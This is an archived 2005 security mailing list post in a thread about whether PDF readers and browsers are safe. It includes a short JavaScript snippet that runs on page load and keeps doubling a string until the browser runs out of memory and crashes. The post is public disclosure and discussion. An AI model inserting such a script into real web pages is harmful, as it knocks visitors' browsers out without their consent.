lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Thu Sep 22 10:52:59 2005
From: gautam.bipin at gmail.com (Bipin Gautam)
Subject: PDF's unsafe?

On 9/21/05, Geo. <geoincidents@....net> wrote:
> Haven't any of the security firms checked out adobe pdf reader to see if
> it's safe? It took 5 minutes to create this nonsense
> http://www.nthelp.com/test.pdf and that's just using the standard features.
> I hate to think what a real hacker could do with a pdf.
>
> Geo.
>
Even if you have the option in IE "Play videos in webpage"
unchecked... the following page will render....

http://bipin.sosvulnerable.net/temp/fdrd.html

& probably your OS will colse the browser after it runs out of memory.

Or maybe try this:

/* ------------
<body onload="hUNT()">
<script language="JavaScript"><!--
var szhUNT="...cauz its a jungle out there!"
function hUNT()
{szhUNT=szhUNT + szhUNT
window.status="String Length is: "+szhUNT.length
window.setTimeout('hUNT()',1);}
// --></script>
--------------------------- */
SO IE/mozilla  is unsafe?

Bipin Gautam
http://bipin.tk

Zeroth law of security: The possibility of poking a system from lower
privilege is zero unless & until there is possibility of direct,
indirect or consequential communication between the two...

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ